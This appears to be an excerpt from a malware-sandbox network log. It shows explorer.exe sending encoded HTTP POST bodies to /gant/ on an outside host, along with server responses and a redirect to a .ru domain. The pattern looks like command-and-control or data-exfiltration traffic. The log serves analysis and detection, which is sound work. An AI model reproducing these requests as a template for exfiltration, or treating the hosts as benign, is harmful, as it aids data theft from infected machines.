                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.gargaloid.ru/gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&amp;T9=bPxTYTKdI2">here</a>.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  20192.168.11.2049862142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:11.126144886 CET765OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 528
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.lakeviewautomation.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.lakeviewautomation.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 6f 45 64 73 55 30 6b 56 67 41 77 2d 76 64 56 4c 55 2d 38 63 65 57 52 4b 4c 4b 50 73 68 75 33 55 52 52 67 48 50 61 71 72 34 37 35 74 36 45 6a 69 44 66 41 58 69 43 36 56 59 67 71 74 66 31 43 35 53 6d 43 34 73 7a 4d 69 56 7a 6e 74 48 47 44 6f 41 39 51 72 7a 66 58 37 53 4c 79 33 73 59 62 53 53 5f 45 31 46 65 43 66 38 48 4a 50 59 61 48 57 45 61 65 71 5a 4a 42 4e 6b 63 67 37 63 2d 37 5f 5a 58 41 44 49 75 47 4e 4e 54 69 59 57 4e 41 56 56 72 4d 6d 4f 79 28 63 50 4c 6b 65 5a 75 65 38 35 57 61 48 59 56 62 38 32 58 78 71 4e 43 4f 75 33 39 61 34 55 6d 77 70 41 6f 64 47 52 77 37 6c 42 44 74 33 53 54 46 78 37 30 52 55 58 4e 74 46 74 73 39 46 58 37 46 52 6a 31 78 70 70 56 70 6f 4b 6f 4a 75 53 38 7a 4e 6e 49 7a 46 7a 59 47 47 64 30 35 6b 67 49 77 79 68 67 50 65 57 57 4c 52 48 48 58 59 56 4b 4a 6c 70 41 79 66 4d 79 41 58 39 31 73 68 58 4d 4d 38 43 79 30 39 69 51 5a 64 74 63 4f 77 70 49 6a 32 33 62 44 34 65 4b 31 37 61 42 7e 32 42 34 7a 64 77 79 28 56 61 75 50 34 43 78 64 54 39 7a 54 53 6c 49 4b 69 51 41 67 6f 6c 4b 56 69 49 4d 7e 31 52 43 43 6e 45 6f 79 43 46 62 7e 5f 55 51 35 32 78 53 52 43 6c 67 78 78 7e 36 41 56 46 49 6f 65 6b 7a 37 57 46 78 61 4d 4e 32 62 78 70 38 67 4d 4b 71 51 4a 76 41 51 65 4e 36 41 76 59 41 57 74 53 51 4b 5a 70 2d 57 4c 4c 36 7a 43 44 76 33 72 4d 4c 73 75 6b 76 75 49 32 47 77 53 62 5f 6f 45 62 4a 33 34 51 4e 73 39 6a 4b 4b 64 30 54 34 38 6f 30 78 45 4a 39 7a 4e 50 71 56 75 7e 79 79 65 68 4e 64 49 32 51 72 44 62 71 5a 46 43 4f 28 6a 32 35 6a 43 62 4e 66 65 74 48 44 45 59 65 4d 44 31 34 56 4e 64 2d 66 6a 4a 46 76 42 76 57 38 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=oEdsU0kVgAw-vdVLU-8ceWRKLKPshu3URRgHPaqr475t6EjiDfAXiC6VYgqtf1C5SmC4szMiVzntHGDoA9QrzfX7SLy3sYbSS_E1FeCf8HJPYaHWEaeqZJBNkcg7c-7_ZXADIuGNNTiYWNAVVrMmOy(cPLkeZue85WaHYVb82XxqNCOu39a4UmwpAodGRw7lBDt3STFx70RUXNtFts9FX7FRj1xppVpoKoJuS8zNnIzFzYGGd05kgIwyhgPeWWLRHHXYVKJlpAyfMyAX91shXMM8Cy09iQZdtcOwpIj23bD4eK17aB~2B4zdwy(VauP4CxdT9zTSlIKiQAgolKViIM~1RCCnEoyCFb~_UQ52xSRClgxx~6AVFIoekz7WFxaMN2bxp8gMKqQJvAQeN6AvYAWtSQKZp-WLL6zCDv3rMLsukvuI2GwSb_oEbJ34QNs9jKKd0T48o0xEJ9zNPqVu~yyehNdI2QrDbqZFCO(j25jCbNfetHDEYeMD14VNd-fjJFvBvW8.
                                                                                                                  Feb 13, 2023 19:01:11.596565008 CET766INHTTP/1.1 200 OK
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/7.4.33
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  retry-after: Sat, 25 Mar 2023 11:59:00 UTC
                                                                                                                  content-length: 771
                                                                                                                  content-encoding: gzip
                                                                                                                  vary: Accept-Encoding
                                                                                                                  date: Mon, 13 Feb 2023 18:01:11 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 cd 56 4b 6f e3 36 10 be 07 c8 7f 18 30 40 7a d8 4a b4 ec d4 eb 24 92 16 c5 02 3d 15 e8 61 17 ed 99 96 46 12 61 8a 64 c9 91 15 ff fb 82 94 15 ab 49 bb 45 fa c2 1e 4c 0f 87 1c f2 fb e6 45 5d 5f 5d 5f 01 84 df 1f 8d 39 49 52 58 fe 28 0e 08 3f 4b 1c e1 fb 81 4c 2f 04 49 a3 41 7a 18 74 8d 0e 2a a3 3d b9 a1 0a da 9c 4f 26 af 4f cc 95 d4 07 e8 1c 36 05 eb 88 ac 7f e0 bc 31 9a 7c ba 1f b4 3e a5 1a 89 57 de 7f 68 44 2f d5 a9 f8 c1 61 6d 0e e2 dd 4f 1a 19 38 54 05 f3 74 52 e8 3b 44 62 e5 74 fc 74 e4 cb c5 c5 1d 0f 9c 2b 71 c0 a3 c4 51 44 e4 01 62 5a 99 9e 8f 36 a9 8c 26 d4 c4 ad 1a 5a a9 3d 8f 64 82 f6 99 4c 62 45 8b 9c 3a ec d1 07 6c 7c 6f 0c 79 72 c2 a6 bd d4 69 40 7b 2c 36 e9 fd 96 01 9d 2c 16 8c f0 29 92 60 e5 d5 ff 8e ad 32 7d 1f c8 7d 3d a0 94 f1 58 f3 18 b6 af 09 96 f7 31 ef 12 31 a2 37 3d be 29 94 b2 32 9a fd 47 09 26 7b d1 a2 e7 8d 38 86 5b 52 ab 5b 06 3c 66 fa f5 a2 48 f3 5a 1e 41 d6 05 eb d0 99 24 da cc e5 00 90 cb be 05 ef aa a9 c2 fe d5 ec 9f 82 59 c5 bf 09 9b 50 54 b0 4f 92 30 74 82 cf d8 5b e3 84 93 ea 04 1f e3 26 68 8c 83 8f 8b 6a 62 10 5b c3 db 6c e6 4a e7 b5 3c ce 72 f0 40 a5 84 f7 05 0b 35 2c a4 46 17 7c 30 35 05 80 e8 a2 f3 06 67 c6 8b 7b 7e bf 54 19 95 3c f9 24 5b 43 90 fa 7a 96 54 9b 64 eb a5 11 40 de 65 e5 27 e3 dc e9 5b 18 f1 1b 87 50 1b a9 5b 08 e9 03 a3 71 07 30 1a a8 43 f0 92 30 e7 5d 76 46 1a 9a 6a be 40 7e 99 fd 53 a8 bb 19 b3 69 1a 8f 94 4c 1c 54 9b bc 9c ef 5e 10 b1 4b cf a1 26 56 7e ee 84 3e c0 c9 0c 31 60 7b 0c c4 ac 20 89 9a 52 f8 05 41 7c 99 2e 08 5d c3 28 95 82 3d c2 5e 54 07 f0 9d 71 a4 4e 69 ce ed df f6 43 cc 70 6f 2a 29 d4 92 c0 32 b2 6f 09 9f 58 94 6c 78 77 84 95 e9 d8 09 f2 c2 da f8 1c 78 d4 f5 07 db 19 8d c5 7a 73 b7 cb b6 db dd dd e6 fd 76 c3 ca 5c ce 1e 6b 04 34 22 99 cd 82 bc 79 62 65 ce 65 99 73 51 e6 f3 1d bd 90 8a cc c3 ed 4d b6 fa ee f1 f6 26 cb 56 61 5c ad a3 9c 3d de de ac b6 77 51 b3 0b f2 fd fb 28 4f 63 58 cd b2 a0 3f db ae 26 cd 7d d8 79 b7 8d fb 83 9c 65 51 bf ba 7f 7c 8d 0f f5 11 95 b1 f8 a7 f8 08 d5 c3 bb bf 20 19 3d 91 f8 5f 87 10 fc 17 44 e7 d4 bd 24 73 48 f3 cb ec fc 34 2f d2 fe b9 65 29 d3 4a 9d ec 07 a2 d0 45 cf 15 aa 4c db 62 6d 06 62 17 1f 86 ef 83 2f 76 af 78 52 6a 3b fb da 01 a3 71 b5 75 e8 7d 00 be 7e 62 20 9c 14 49 27 eb 1a 75 c1 c8 0d b8 08 da 33 ca d0 3d 7e 03 54 89 bc 6f 0c 09 00 00
                                                                                                                  Data Ascii: VKo60@zJ$=aFadIELE]_]_9IRX(?KL/IAzt*=O&O61|>WhD/amO8TtR;Dbtt+qQDbZ6&Z=dLbE:l|oyri@{,6,)`2}}=X117=)2G&{8[R[<fHZA$YPTO0t[&hjb[lJ<r@5,F|05g{~T<$[CzTd@e'[P[q0C0]vFj@~SiLT^K&V~>1`{ RA|.](=^TqNiCpo*)2oXlxwxzsv\k4"ybeesQM&Va\=wQ(OcX?&}yeQ| =_D$sH4/e)JELbmb/vxRj;qu}~b I'u3=~To


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  21192.168.11.2049863142.44.131.17780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:01:13.751235962 CET773OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.lakeviewautomation.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.lakeviewautomation.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.lakeviewautomation.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 6f 45 64 73 55 30 6b 56 67 41 77 2d 76 64 56 4c 55 2d 38 63 65 57 52 4b 4c 4b 50 73 68 75 33 55 52 52 67 48 50 61 71 72 34 37 78 74 36 56 44 69 4d 63 34 58 6a 43 36 56 51 41 71 6f 66 31 43 30 53 6d 61 38 73 7a 77 49 56 77 66 74 48 52 48 6f 41 4c 45 72 6c 50 58 36 58 4c 79 35 6f 59 62 4f 53 5f 34 68 46 65 47 68 38 7a 42 50 4b 70 7a 57 41 70 47 70 47 70 42 4c 6b 63 67 42 52 65 37 64 5a 58 4d 54 49 76 36 4e 4e 56 69 59 58 5f 49 56 58 59 55 6d 57 53 28 64 42 72 6b 52 51 4f 65 56 35 57 6d 31 59 56 62 57 32 57 6c 71 4e 42 71 75 77 36 4f 37 55 47 77 70 44 6f 64 46 56 77 48 68 42 44 77 30 53 54 42 78 37 79 78 55 58 74 74 46 6d 76 6c 45 41 72 46 58 6e 31 78 2d 7e 46 74 67 4b 6f 63 58 53 34 72 4e 6b 34 33 46 79 72 65 47 62 51 74 6b 74 49 77 30 76 41 50 42 41 6d 4c 4e 48 48 6e 75 56 4a 42 62 70 48 4b 66 4d 58 4d 58 34 55 73 69 46 73 4d 41 65 69 30 6f 7a 41 64 52 74 66 6d 53 70 49 6a 6d 33 61 33 34 65 36 46 37 62 44 47 31 42 6f 7a 65 70 69 28 4d 56 4f 7a 2d 43 78 70 74 39 7a 72 43 6c 4c 6d 69 66 41 67 6f 33 35 4e 68 52 73 7e 2d 66 53 43 50 4c 49 7a 61 46 61 43 56 55 55 68 49 32 69 31 43 33 41 68 78 76 61 41 4b 41 6f 6f 61 71 54 37 55 42 78 61 4d 4e 32 58 4c 70 38 6b 4d 4b 66 38 4a 75 33 55 65 64 64 55 76 61 41 57 33 53 51 4b 49 70 2d 4c 31 4c 37 4c 73 44 76 6e 42 4d 4e 30 75 39 61 43 49 31 48 77 52 64 50 6f 46 52 70 32 75 49 74 68 6e 6a 4b 47 46 30 58 63 73 6f 6a 4a 45 50 4d 44 4e 4c 71 56 74 37 53 79 5a 6b 4e 64 6b 38 77 33 66 62 71 55 34 43 50 4c 7a 32 36 54 43 61 49 6d 70 35 32 50 67 4c 2d 41 35 78 34 4a 4c 65 5a 6e 6f 55 32 6a 72 37 41 64 6e 48 41 68 5f 48 38 6d 59 4e 53 7e 5a 71 42 77 58 4b 72 50 66 38 5f 67 45 4a 52 33 6e 53 32 6f 64 50 49 62 77 6c 6d 47 51 54 76 61 4e 35 52 79 72 46 6f 71 63 53 42 45 50 61 77 79 6b 32 6d 30 4d 73 45 49 73 50 69 4f 2d 53 41 56 70 30 6f 71 70 45 37 4f 41 57 31 71 4b 59 4f 57 52 31 65 6a 2d 49 71 73 30 58 4a 75 49 61 4b 57 32 4b 5a 54 71 6a 6c 56 36 4d 73 68 58 6a 78 66 74 4f 49 62 62 53 48 56 69 31 66 38 37 72 6e 68 62 44 5a 4f 78 70 31 4f 55 6c 68 56 30 56 63 41 4b 51 32 6c 47 55 30 36 61 78 6e 6f 58 56 61 51 67 4d 69 33 51 63 65 56 66 45 56 4a 4e 64 4a 33 78 55 44 64 31 68 32 31 76 51 4a 44 53 44 70 75 78 6f 4a 4a 4f 56 64 34 36 67 6f 56 45 68 6b 58 50 55 31 69 4e 38 48 74 32 51 46 41 6f 79 54 53 32 48 4f 5a 6f 36 4c 76 48 48 71 33 41 6f 4f 57 52 44 58 75 61 32 79 46 70 4c 71 64 79 28 61 47 4f 64 2d 53 61 55 6d 61 2d 64 50 65 67 45 53 38 4e 35 52 4e 77 6a 70 4e 46 35 64 49 61 46 2d 55 67 72 54 4e 45 53 68 52 41 47 55 54 72 69 6f 50 6e 73 36 64 72 57 79 69 30 73 43 30 71 39 70 30 52 31 50 62 69 68 50 37 4d 50 45 4d 50 41 6e 7a 7a 7e 4a 70 4b 62 66 41 73 73 41 39 33 46 6c 6e 30 50 49 39 59 73 35 66 65 33 35 54 2d 37 30 55 36 52 6a 30 62 68 61 6d 39 59 76 6b 73 57 39 36 35 4e 4f 69 79 70 61 6e 69 63 6f 74 41 4a 68 6a 56 59 5f 4c 63 6b 6b 6f 49 48 54 63 4e 48 44 58 36 6d 57 63 44 68 45 33 79 56 76 75 32 62 2d 73 4a 56 4d 58 43 63 65 76 56 30 46 53 32 6e 6c 5a 4f 46 50 7e 71 47 78 28 38 67 4d 63 6b 68 78 63 42 58 49 4d 71 78 36 28 2d 39 32 4f 47 63 35 31 39 41 39 39 59 37 77 64 74 35 6d 41 77 68 53 58 38 28 4b 34 31 37 71 72 78 35 32 67 65 5a 33 4d 37 79 58 75 42 43 4c 47 58 45 4e 57 59 54 5f 79 4f 54 37 55 44 77 70 62 6a 31 4f 4a 6e 53 50 39 33 78 50 50 51 35 6b 34 33 28 41 39 32 46 36 71 65 7a 6a 4d 44 74 78 71 36 49 65 47 4f 78 72 39 37 6d 47 36 72 31 79 51 49 39 6b 6f 7a 77 4b 66 64 4f 53 37 35 53 67 36 41 64 31 43 33 37 6e 44 4b 75 59 67 6f 44 4e 33 53 55 7a 7e 47 68 47 49 35 41 65 57 4f 43 6f 54 67 79 35 5a 69 77 4c 48 5f 69 42 66 4c 4d 51 67 35 45 79 55 53 75 76 32 6e 61 34 58 70 4c 50 30 39 70 61 6e 51 68 48 61 4b 6a 4c 66 2d 49 72 39 56 63 72 4c 7a 64 37 4e 34 42 50 6a 51 50 64 32 31 42 59 50 46 74 38 55 6f 34 62 6c 74 67 66 31 6d 78 61 57 53 6a 51 59 4f 50 68 69 4c 36 62 53 78 56 63 7a 4b 65 52 33 47 68 39 6c 36 75 4c 73 55 71 45 48 6b 48 48 50 68 71 52 57 42 69 33 7a 36 4b 4e 55 31 34 59 41 52 75 2d 6f 61 67 59 35 4e 71 4e 77 6c 4d 6a 31 76 75 31 57 6d 72 53 5a 75 7a 6c 35 6f 4e 69 44 77 47 77 30 71 57 4c 6b 64 76 65 6b 54 4c 4d 43 62 39 64 35 35 39 56 57 4c
                                                                                                                  Data Ascii: j-Jh9P=oEdsU0kVgAw-vdVLU-8ceWRKLKPshu3URRgHPaqr47xt6VDiMc4XjC6VQAqof1C0Sma8szwIVwftHRHoALErlPX6XLy5oYbOS_4hFeGh8zBPKpzWApGpGpBLkcgBRe7dZXMTIv6NNViYX_IVXYUmWS(dBrkRQOeV5Wm1YVbW2WlqNBquw6O7UGwpDodFVwHhBDw0STBx7yxUXttFmvlEArFXn1x-~FtgKocXS4rNk43FyreGbQtktIw0vAPBAmLNHHnuVJBbpHKfMXMX4UsiFsMAei0ozAdRtfmSpIjm3a34e6F7bDG1Bozepi(MVOz-Cxpt9zrClLmifAgo35NhRs~-fSCPLIzaFaCVUUhI2i1C3AhxvaAKAooaqT7UBxaMN2XLp8kMKf8Ju3UeddUvaAW3SQKIp-L1L7LsDvnBMN0u9aCI1HwRdPoFRp2uIthnjKGF0XcsojJEPMDNLqVt7SyZkNdk8w3fbqU4CPLz26TCaImp52PgL-A5x4JLeZnoU2jr7AdnHAh_H8mYNS~ZqBwXKrPf8_gEJR3nS2odPIbwlmGQTvaN5RyrFoqcSBEPawyk2m0MsEIsPiO-SAVp0oqpE7OAW1qKYOWR1ej-Iqs0XJuIaKW2KZTqjlV6MshXjxftOIbbSHVi1f87rnhbDZOxp1OUlhV0VcAKQ2lGU06axnoXVaQgMi3QceVfEVJNdJ3xUDd1h21vQJDSDpuxoJJOVd46goVEhkXPU1iN8Ht2QFAoyTS2HOZo6LvHHq3AoOWRDXua2yFpLqdy(aGOd-SaUma-dPegES8N5RNwjpNF5dIaF-UgrTNEShRAGUTrioPns6drWyi0sC0q9p0R1PbihP7MPEMPAnzz~JpKbfAssA93Fln0PI9Ys5fe35T-70U6Rj0bham9YvksW965NOiypanicotAJhjVY_LckkoIHTcNHDX6mWcDhE3yVvu2b-sJVMXCcevV0FS2nlZOFP~qGx(8gMckhxcBXIMqx6(-92OGc519A99Y7wdt5mAwhSX8(K417qrx52geZ3M7yXuBCLGXENWYT_yOT7UDwpbj1OJnSP93xPPQ5k43(A92F6qezjMDtxq6IeGOxr97mG6r1yQI9kozwKfdOS75Sg6Ad1C37nDKuYgoDN3SUz~GhGI5AeWOCoTgy5ZiwLH_iBfLMQg5EyUSuv2na4XpLP09panQhHaKjLf-Ir9VcrLzd7N4BPjQPd21BYPFt8Uo4bltgf1mxaWSjQYOPhiL6bSxVczKeR3Gh9l6uLsUqEHkHHPhqRWBi3z6KNU14YARu-oagY5NqNwlMj1vu1WmrSZuzl5oNiDwGw0qWLkdvekTLMCb9d559VWLYAGaApf135C1m44pFs(ujAEp(3t-NWXSymvVcQU-vSHLDa22M4bPKJKvtvVKt66NEnoX3Uyju7xe2Lghl5u-U4eBYGs43jBBr-dNhKJx5HplkwOxAy0JBgisdBF3cAE9~_nvAvuOyfdO~GYlSeAklkdD0zFwEvbjtF5MeOxtWPzCd6VkHqxl67wZ6BrPoMgMGaNqEOykCK3XQZcCFF60sSWlKpn2MKgQpbg4gYhtEd~Mz2yaeQOZWR1pFL0aPHaMCrWGci07MhUUNJC2E34EjbfNVZmYehmOzTTn2oHVY5pTohNrPoDNGAO1tbIaVzDhNt7j0-vvyK7pCT70NJ3rKxm91OOb27O_CbZDXgaI4uIYpSBHGOFY5dCuQB07umZN(D5Rcu6SX2PCg_2Z3ZnC5b6LlWdV8T3REOKL1xQhcFOCSJ5HaWGWpe1jWsu4wD5KGTzvYyUZbVO8VnG3Pea8sTPIpJ5JOnX1~uS9p2MzKpElT7J-WXiwtzDsVLEzoaoBfRV7oVvdUMhZaxPtrMLMWLdgVzRAh6TAp5af~WhBymN9wTm6mL7K3NmafWjCcduZm08YjPVbRofYYr96WUNt6FFmAcn9~7JscdDgET0KaQ3jA-Y1JBxojz3P2gKBz5JCw19YsAG1nH6iHn5qIB06OwKpb6SIFs991nyi97tQxZ8xM8FqLpWOD6NIJOgIM1vDg4Qm2hcPojeyNJWeO7~u6Ncko6ndFsB132x7rVlpTiw6EYYhocrAMfjWiGYAhik06eFUFnEQEkjr0rq_aR8Hj-OerK8sFMKKiaQfuakPG7U4lGzCNFSAm115vNjKO1e0uVZl7A3OgHAozHseWz8osbF_J4z6(nF9kQTBhuyms1RbvwqAm-2o604O8K~2na1M3iPdoEP7vhkdaqKO~eZa9iaoMg(_GB3tJSiRNbhX63hxaxdQta5fxQqjCM~jTd15dbplT1nmmdH_omKJb2zTPYYJMa0SQecub3kZgRdOOHwLzpKGLsDKRe~NxzF70QRr5wTTURLQwdpd3cJoBV3LpbL9xW63EV7hDKTIfiDhe6T4gpKz0hRGGEwCvckNMukUNYt4blrlJR2W8Cho2u1rYnO_i_kx7VZfsSrX(bO4DtyLMX3cdiCXs-hVDGF4uslf7VIq(4jIov8WgB8lHrevnsCMHBlbMSL-gEJKPEnsvOOvcticFrBxp_zNL4sDXlJFmqMCXC2lyeGCn89zxTVq4lSoQ4yw68JCjRBn2l0baXd-Ne44fFmKqiFm4Q7eBfjNv4toOPVFnbH-qKfiFt7DEEGpA6zWnQjfih30XvkegFeYWgSsLf4DynI7PvH9C6JGu8OhyAGFxhPDSAp1qZiEAKNyaRNAB7GeGSQU7M~vy5Z69yi9yDlINcABGspKxE4WQqKdmadx6mCsj0FmGM43nLKqyYQf5SKInGB8xXN2J1atzC70pSAmU8efa5QQL9ZnLZALUHQy8_DxqmlLevV4fD~w6tSCVeuHO5o4JQlpUxpAXhjSNOM8G6ElgB6xU-ThO-GAhc0yD-DtPztuQvEQ77Ctas(8DO4kx8vbBvvq2w(ww3DlZ35ALICn3O4vgpeuwOD6qVUEnGpqedl34ynbQMZS8pB7C2s23dWjkR0OIu5BqtaHzixrnCeA9nZ04y7pVrHB9uK2iG7SjsKtUVvygibkVIk81o3F6wEQkMH2trqxcFhB7epPFgXtvlzfXRpUaaF18Crhb1GYMQkYHDWmvmmEE2WvLvUuJQnRfGBHHeCQiczf36LFWmBIyWV6ICS2dm0ykdbMMClEPFgxl5lBNIz8QsrlKJU6SIiQ1ooSGvmjSeTbmKVr5N9X~VU7qp8jHZbg50KcQvJulRp7L-x5Q_d7AQUPZuNxcqVJ10eRQ1FImuSGbtgR2UkE2q0uhnRoix3ioJPTeGdg3SvtwvdTFN2KRhfnf_J053e2IRFSrT6c36ceh4u_e_fL4roFJooN83gYZqqmfePSHcerLv0MJluk3HSfp59DK9UMehPvtPfbW2AGuL8b0q1NfybM~wKfdPiq4mrZkla42boL6rafxOVLKa5cDA1NMaIDJq516oQKmnUPq282Jy0-1kGjwDxSHevNt0KMFZO0Gj6vFEBrCdyuPv~GnFkn2KaMOiXUEgPzcb4szeEJSsM6wYoDAd2jB8KU4mlQ7XUabP8njoJdvLAC~CqdK5mP0G823i6_0W36lDzCajN0FG~-kxgjBOj4~LV2(27E76GVJP5yYM2C3CbMhUS497jabPe3ejge2ERQLp9QGa3mL6Zd7d5YIK0iqWTwlVSJYd1xSCcimRCJEYu7sdfLqr2_D1KjGzyAxyP5(ZOdegEyY0O63oTNCvUejhGpTgJ-L9KvIVWTceomZgjd1cS9pyYeplxDvjyGa64uoMr-57sLsDPVjMUDXC9lnOB6KaV7V6nFa_gx(bGImRilMSqFDlnvA2fVVqqwNkmgB2ryOGjXNpC4OMwjtm6SkhY42fXFtANEsvuMu175HIib84Hd(5le15lEaW9D6RmsgzJ3Zc0na9RZRHLFsuKks4SfJG8ujgQL(cAMAlUk2-YAlvZpL0lQL9P4UKjWNYcxfSfn7I9BM47n5ZhGXLgrEgtiCNPhI-uVUPUO61ORWwCmXI2xCZHvto9nKGMmWpnVDUnGibJZD95n(ZoYORUT~W2rTneIVqlZSt6eEq516xl_VRMv7oW7kIK
                                                                                                                  Feb 13, 2023 19:01:13.751342058 CET779OUTData Raw: 47 65 48 6e 35 77 48 78 6d 6c 72 6c 49 68 74 49 2d 28 79 4e 46 32 7a 64 50 48 57 68 57 74 6e 45 6c 4f 44 6b 38 32 4a 50 49 35 7a 5a 33 6b 34 35 30 59 4c 53 46 50 76 72 66 44 41 55 32 36 35 33 52 34 71 64 31 6a 39 6a 7a 58 4b 7e 66 37 4c 76 36 70
                                                                                                                  Data Ascii: GeHn5wHxmlrlIhtI-(yNF2zdPHWhWtnElODk82JPI5zZ3k450YLSFPvrfDAU2653R4qd1j9jzXK~f7Lv6pG(tzNobUpfzqcVqdwFVyIapRvvz(0qIheAO4lre6uY4VHa8cvV9nW(q3rrCFPmmIww9psC9DZzGJwa9aQs-qJAZm-22bhzeSqQm7rA4WC7h1377vqzbjzsP2zkueLiCXYPvTIbtzmnhos6PvZnRwgAF~3FbDcgvZ8
                                                                                                                  Feb 13, 2023 19:01:13.847726107 CET782OUTData Raw: 4e 42 6c 38 64 61 78 49 78 28 48 58 68 6f 7a 46 50 28 30 64 38 6d 77 69 58 46 6f 57 46 30 6a 43 69 76 6e 7e 4c 47 34 55 68 32 4b 31 41 51 45 4a 65 38 35 5a 43 70 43 6a 7a 36 6b 76 66 42 79 43 65 54 7a 31 7a 4f 48 44 39 37 38 34 59 61 43 6e 77 54
                                                                                                                  Data Ascii: NBl8daxIx(HXhozFP(0d8mwiXFoWF0jCivn~LG4Uh2K1AQEJe85ZCpCjz6kvfByCeTz1zOHD9784YaCnwTaVUHMRs3G5gcUXjdHilFbY-f1SfxrYWFr8K5I4YFZqJpwmSuL(6mGk4wXHHDTWmtzarfZwNc72YPxltINa66vc4Xb~1kIlzw-cMRdHi6CaLNdztdkAAvpboRUqTqkp_XrUXYiE2O96jvf84Ha4pbtLP2cJ1zPHZSA
                                                                                                                  Feb 13, 2023 19:01:13.847940922 CET790OUTData Raw: 71 74 6d 31 30 65 55 42 46 79 31 76 4f 4d 56 46 67 54 30 63 57 72 2d 56 50 39 73 6c 68 30 48 4d 61 43 53 6f 36 57 64 58 34 61 67 50 76 67 2d 30 46 50 67 78 44 6f 73 53 41 53 72 6f 77 62 56 6d 51 68 69 35 38 55 65 54 51 71 50 57 54 7a 31 52 79 44
                                                                                                                  Data Ascii: qtm10eUBFy1vOMVFgT0cWr-VP9slh0HMaCSo6WdX4agPvg-0FPgxDosSASrowbVmQhi58UeTQqPWTz1RyDxL6KmIa2uD4g5VyArOO(ugpUgGgXH8tcq0KoUSHlDI1XJMFC1aycBLD(qGaxI1lJT6a(O5FSff_(GjIGXqSaRm0VPrV6BsrOv8wh3JvRQxX~XXSKwNT5BKDOKd7eP~hKSEZCr(z~c88oUbGkjcyiKKp4IbEhmpyuc
                                                                                                                  Feb 13, 2023 19:01:13.848274946 CET797OUTData Raw: 6b 56 49 66 44 47 78 63 42 6a 4d 75 79 69 58 79 72 45 65 31 62 30 6c 65 75 28 6a 6f 63 6f 70 6b 74 75 78 56 39 4d 67 72 7a 31 68 6f 47 68 71 61 65 59 39 46 52 78 6e 37 4b 50 78 4e 33 79 38 56 33 68 6e 4d 65 67 6a 38 64 59 65 69 44 32 46 28 79 45
                                                                                                                  Data Ascii: kVIfDGxcBjMuyiXyrEe1b0leu(jocopktuxV9Mgrz1hoGhqaeY9FRxn7KPxN3y8V3hnMegj8dYeiD2F(yEHmbPmDvCS0Dh4Cgk9TrWIylwHcQZSSZSbgOY_Bd4-YJ4cObpfPh~zeFLuA6jE~bjb(6tCByYZBoyOMTfwBmN47cbYd3ara6wyZrcHrCYNu4DFe-llNZnfJfvZFlyRWvQuJqwwqdFReSKkLge8AY8enlqmDSVV11WA
                                                                                                                  Feb 13, 2023 19:01:13.848404884 CET805OUTData Raw: 56 57 71 63 61 52 45 70 42 68 61 28 32 63 44 59 32 46 66 34 72 6f 68 46 79 6f 45 51 76 4e 41 6a 73 53 2d 5a 30 59 32 48 66 69 58 6d 64 75 33 54 38 63 36 68 65 72 37 73 76 6e 79 79 74 64 56 4b 64 44 30 44 4f 31 59 38 49 58 45 70 38 4b 77 7a 38 72
                                                                                                                  Data Ascii: VWqcaREpBha(2cDY2Ff4rohFyoEQvNAjsS-Z0Y2HfiXmdu3T8c6her7svnyytdVKdD0DO1Y8IXEp8Kwz8rtwNkXOuoOFe0Z8GqRx9L0c6e7UoLltyKfsjTl1DIkgLelvsJvx_3ZNyXoY6xeHNkgz7JNRublagl1dLyAYJUz5nOuOHRUMh~qdMYPLArw(WH2hASg39z5qXquuKd-Dcu2UxtXUgM73uFGAtE8vJ6CpB32EbUtj1p6
                                                                                                                  Feb 13, 2023 19:01:13.944756031 CET809OUTData Raw: 4a 59 72 31 79 76 59 73 49 62 57 7e 44 76 5f 63 51 6a 47 70 47 65 4c 55 53 28 62 64 5a 43 76 34 44 67 50 67 72 76 78 38 63 54 51 59 6b 43 30 78 36 70 51 71 36 74 52 56 77 38 6e 47 58 76 4e 70 6d 58 63 71 32 65 59 6a 6a 6c 38 68 69 43 35 4e 6c 59
